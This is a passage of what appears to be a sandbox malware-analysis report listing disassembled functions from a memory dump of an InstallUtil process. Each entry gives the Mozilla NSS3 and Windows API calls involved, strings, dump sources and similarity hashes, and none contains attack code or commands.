                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C755DEF,?,?,?), ref: 6C756456
                                                                                                                  • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C755DEF,?,?,?), ref: 6C756476
                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C755DEF,?,?,?), ref: 6C7564A0
                                                                                                                  • PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C755DEF,?,?,?), ref: 6C7564C2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CertificateError$DestroyTemp
                                                                                                                  • String ID: ]ul
                                                                                                                  • API String ID: 3886907618-1500978261
                                                                                                                  • Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                                                  • Instruction ID: 9970f1fe5252cec1485298650511c96b199aad87cd4b6c6fdb7ddf87a20b1eae
                                                                                                                  • Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                                                  • Instruction Fuzzy Hash: AD2127B0A002016BEB209F68DD49B6376E9EB00319F944538F529C6B51EBB2DB68C391
                                                                                                                  Function 6C7A4590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000008,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A459B
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • TlsGetValue.KERNEL32(?,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A45BF
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A45D3
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A45E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
                                                                                                                  • String ID: Ozyl
                                                                                                                  • API String ID: 2963671366-28087613
                                                                                                                  • Opcode ID: adb4248c8aa34c2e3e7197950a54a142b3c44b237be37a2135b41f4a6ededec6
                                                                                                                  • Instruction ID: 397e48b05ce8ef42524ba40498b88f35018dbfd2c9acecebb7597fb7d8eec944
                                                                                                                  • Opcode Fuzzy Hash: adb4248c8aa34c2e3e7197950a54a142b3c44b237be37a2135b41f4a6ededec6
                                                                                                                  • Instruction Fuzzy Hash: 3921C5B0E00206AFDB109FA9DE495AABBB4FF09359F004635D848D7B11EB32E555CBD1
                                                                                                                  Function 6C82A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C6F7915,?,?), ref: 6C82A86D
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C6F7915,?,?), ref: 6C82A8A6
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C82A89B
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C82A891
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C82A8A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulongsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 912837312-598938438
                                                                                                                  • Opcode ID: f58da88abe7f1beb1aebde925bbe3cf3d7c4139f307ac9392249571b45626520
                                                                                                                  • Instruction ID: a1d06a7276c02f910841d32a02fb11fa9530b61753455662d1b38b99056d0c87
                                                                                                                  • Opcode Fuzzy Hash: f58da88abe7f1beb1aebde925bbe3cf3d7c4139f307ac9392249571b45626520
                                                                                                                  • Instruction Fuzzy Hash: 26113671A00214ABC7248F15DD44AAAB7A2FF88714F004838FC194BB40EB349956C7D1
                                                                                                                  Function 6C740DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C740BDE), ref: 6C740DCB
                                                                                                                  • strrchr.VCRUNTIME140(00000000,0000005C,?,6C740BDE), ref: 6C740DEA
                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C740BDE), ref: 6C740DFC
                                                                                                                  • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C740BDE), ref: 6C740E32
                                                                                                                  Strings
                                                                                                                  • %s incr => %d (find lib), xrefs: 6C740E2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strrchr$Print_stricmp
                                                                                                                  • String ID: %s incr => %d (find lib)
                                                                                                                  • API String ID: 97259331-2309350800
                                                                                                                  • Opcode ID: 8531dea6886c62677425863bd6c98c22d22b8454d50795a28b469aa7fb74dbba
                                                                                                                  • Instruction ID: c25f6fd944881f2d74e47070e22c2fdd2e2ba7fca9ee237223085d78fa5387a7
                                                                                                                  • Opcode Fuzzy Hash: 8531dea6886c62677425863bd6c98c22d22b8454d50795a28b469aa7fb74dbba
                                                                                                                  • Instruction Fuzzy Hash: 5101F1726006249FE6209E29DD49E1773ADDB45B09B04887DE909D7A41E762FC28CBE1
                                                                                                                  Function 6C7FAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_FreeSymKey.NSS3(?,@]~l,00000000,?,?,6C7D6AC6,?), ref: 6C7FAC2D
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(?,@]~l,00000000,?,?,6C7D6AC6,?), ref: 6C7FAC44
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]~l,00000000,?,?,6C7D6AC6,?), ref: 6C7FAC59
                                                                                                                  • free.MOZGLUE(8CB6FF01,6C7D6AC6,?,?,?,?,?,?,?,?,?,?,6C7E5D40,00000000,?,6C7EAAD4), ref: 6C7FAC62
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                  • String ID: @]~l
                                                                                                                  • API String ID: 1595327144-730612681
                                                                                                                  • Opcode ID: fcff4083ed0deb628714534b78ebe1a8b60bd7ded8d7039f4dce4716c2233343
                                                                                                                  • Instruction ID: 9f396b8d4694e62f070e92c2da15776c10f92b689213d27eeeca20f8aa5aef02
                                                                                                                  • Opcode Fuzzy Hash: fcff4083ed0deb628714534b78ebe1a8b60bd7ded8d7039f4dce4716c2233343
                                                                                                                  • Instruction Fuzzy Hash: 19018BB5A012009FDB00CF54EAD4B5677A8AF04B2CF188078E9198F706D731E809CBE1
                                                                                                                  Function 6C79C590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C79C5C7
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C79C603
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C79C636
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C79C6D7
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C79C6E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$DoesMechanism$Free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3860933388-0
                                                                                                                  • Opcode ID: 9defca2015469c353eeaa5f0c4d25479793fae539ef885440e9b94684a3d7ad6
                                                                                                                  • Instruction ID: 7cc3c90cd7b8d8a9ebb2e42daeae8e10b303fdee60546074fcc7684b6a177a59
                                                                                                                  • Opcode Fuzzy Hash: 9defca2015469c353eeaa5f0c4d25479793fae539ef885440e9b94684a3d7ad6
                                                                                                                  • Instruction Fuzzy Hash: 184183B560120AAFDF019F69ED85DAB77A9EF08249B500038FD08D7711E731E925CBA1
                                                                                                                  Function 6C7E2460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,6C887379,00000002,?), ref: 6C7E2493
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7E24B4
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C887379,00000002,?), ref: 6C7E24EA
                                                                                                                  • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C887379,00000002,?), ref: 6C7E24F5
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C887379,00000002,?), ref: 6C7E24FE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Alloc_FreeK11_Utilfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2595244113-0
                                                                                                                  • Opcode ID: b852119d09edb0f4d2646b1652a0cbfcbcacfb81c749af1bc998ceba68268d6b
                                                                                                                  • Instruction ID: 231eb799b08265ec2c1f038ed5cb03eccbea7b48a0dd97812260a18b8a353e70
                                                                                                                  • Opcode Fuzzy Hash: b852119d09edb0f4d2646b1652a0cbfcbcacfb81c749af1bc998ceba68268d6b
                                                                                                                  • Instruction Fuzzy Hash: 3C31D0B2A00116ABEB108FA5DD49BBB77A4EF48318F108125FD289A790E730DC55C7E1
                                                                                                                  Function 6C7E8530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$IdentitiesLayermemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2311246771-0
                                                                                                                  • Opcode ID: a41d7146801af285b01504d8fceaed69afcab4d2ea1df61f69401683ae3d9693
                                                                                                                  • Instruction ID: b6194a924d49f0b9d90e9de08383e9f398344c4093bd134aa4c38b4ce9535393
                                                                                                                  • Opcode Fuzzy Hash: a41d7146801af285b01504d8fceaed69afcab4d2ea1df61f69401683ae3d9693
                                                                                                                  • Instruction Fuzzy Hash: E3418D71609601CBEB10AF7CC74866AB7B4BF5934CF11863AD89887B52EB30D495CB86
                                                                                                                  Function 6C74EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C74EDFD
                                                                                                                  • calloc.MOZGLUE(00000001,00000000), ref: 6C74EE64
                                                                                                                  • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C74EECC
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C74EEEB
                                                                                                                  • free.MOZGLUE(?), ref: 6C74EEF6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorValuecallocfreememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3833505462-0
                                                                                                                  • Opcode ID: 935f9b079d64a39d8bf6b9adb4933545cc5e17b052f0cdbb735b61d96a75e368
                                                                                                                  • Instruction ID: 0fa326936bc48bb9dccfed05b4373e4edba98bac2cea77ec4dcfa002f118b713
                                                                                                                  • Opcode Fuzzy Hash: 935f9b079d64a39d8bf6b9adb4933545cc5e17b052f0cdbb735b61d96a75e368
                                                                                                                  • Instruction Fuzzy Hash: FD31F5B1A002299BF720DF29CD44F66BBB8FB46328F144538E85A87A51E731E814CBD1
                                                                                                                  Function 6C86A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86A55C
                                                                                                                  • PR_IntervalNow.NSS3 ref: 6C86A573
                                                                                                                  • PR_IntervalNow.NSS3 ref: 6C86A5A5
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86A603
                                                                                                                    • Part of subcall function 6C819890: TlsGetValue.KERNEL32(?,?,?,6C8197EB), ref: 6C81989E
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86A636
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Interval$CriticalEnterSectionValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 959321092-0
                                                                                                                  • Opcode ID: a955e227f4bc276e5770023a93f698aa3e27e54e4ac52514a37378298cd5e810
                                                                                                                  • Instruction ID: 049ccd8b44b7edc8f241e952511252f6d424750f4c7eb39de67642f8a8525a4f
                                                                                                                  • Opcode Fuzzy Hash: a955e227f4bc276e5770023a93f698aa3e27e54e4ac52514a37378298cd5e810
                                                                                                                  • Instruction Fuzzy Hash: 47315EB16006168FCB20DF6AC684A9ABBF5FF44318F158975D8148BF16E730EC85CB90
                                                                                                                  Function 6C7544D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3 ref: 6C7544FF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C754524
                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C754537
                                                                                                                  • CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C754579
                                                                                                                    • Part of subcall function 6C7541B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C7541BE
                                                                                                                    • Part of subcall function 6C7541B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7541E9
                                                                                                                    • Part of subcall function 6C7541B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C754227
                                                                                                                    • Part of subcall function 6C7541B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C75423D
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C75459C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3193526912-0
                                                                                                                  • Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                                                  • Instruction ID: 740793508711d623227eef9444f5070f0b8f084aacea5462df57a766dab2fab1
                                                                                                                  • Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                                                  • Instruction Fuzzy Hash: F921F571701200ABEB10CF399E48F6B37A89F41659FA40438FC15CBB49EF21E934E6A1
                                                                                                                  Function 6C75E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C75E755,00000000,00000004,?,?), ref: 6C75E5F5
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C75E62C
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C75E63E
                                                                                                                    • Part of subcall function 6C7AF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C74F379,?,00000000,-00000002), ref: 6C7AF9B7
